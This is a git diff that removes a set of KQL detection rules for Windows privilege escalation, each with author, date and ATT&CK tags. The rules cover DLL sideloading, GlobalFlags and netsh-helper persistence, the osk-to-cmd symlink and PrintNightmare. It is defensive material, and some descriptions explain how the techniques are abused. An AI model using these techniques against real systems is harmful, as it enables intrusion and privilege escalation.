-| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
deleted file mode 100644
index 85e52e34..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbghelp.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
deleted file mode 100644
index bafb67b9..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
deleted file mode 100644
index d6f4a3c3..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/13
-// Level: medium
-// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql
deleted file mode 100644
index 4d8a43ae..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/14
-// Level: medium
-// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql
deleted file mode 100644
index 05e33118..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql b/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql
deleted file mode 100644
index f843422e..00000000
--- a/Privilege Escalation/Potential_EACore.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: high
-// Description: Detects potential DLL sideloading of "EACore.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql b/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql
deleted file mode 100644
index fa643858..00000000
--- a/Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "edputil.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql b/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql
deleted file mode 100644
index 27f1e8dc..00000000
--- a/Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not(((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql b/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql
deleted file mode 100644
index 3d46efa4..00000000
--- a/Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/21
-// Level: high
-// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql b/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql
deleted file mode 100644
index 3fce189b..00000000
--- a/Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql b/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql
deleted file mode 100644
index 163f4b42..00000000
--- a/Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql b/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql
deleted file mode 100644
index 0af11ee9..00000000
--- a/Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Jonhnathan Ribeiro, Florian Roth
-// Date: 2018/04/11
-// Level: high
-// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
-// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql b/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql
deleted file mode 100644
index 5512073b..00000000
--- a/Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
-
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql b/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql
deleted file mode 100644
index 7040127d..00000000
--- a/Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2021/07/01
-// Level: high
-// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql
deleted file mode 100644
index 1a2be179..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql b/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql
deleted file mode 100644
index c40a0f11..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/11
-// Level: high
-// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql b/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql
deleted file mode 100644
index e10e42a6..00000000
--- a/Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level
-// Tags: attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and ProcessIntegrityLevel =~ "Medium"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql b/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql
deleted file mode 100644
index dc23a7d8..00000000
--- a/Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: high
-// Description: Detects potential DLL sideloading of rcdll.dll
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql b/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql
deleted file mode 100644
index fef361b2..00000000
--- a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: medium
-// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql b/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql
deleted file mode 100644
index 172b3879..00000000
--- a/Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql b/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql
deleted file mode 100644
index bd581c2f..00000000
--- a/Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/14
-// Level: medium
-// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql b/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql
deleted file mode 100644
index 5e537033..00000000
--- a/Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql b/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
deleted file mode 100644
index 56927dce..00000000
--- a/Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects installation of a new shim using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql b/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql
deleted file mode 100644
index 83ffa4c6..00000000
--- a/Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/01
-// Level: high
-// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql b/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql
deleted file mode 100644
index fbd5181d..00000000
--- a/Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith 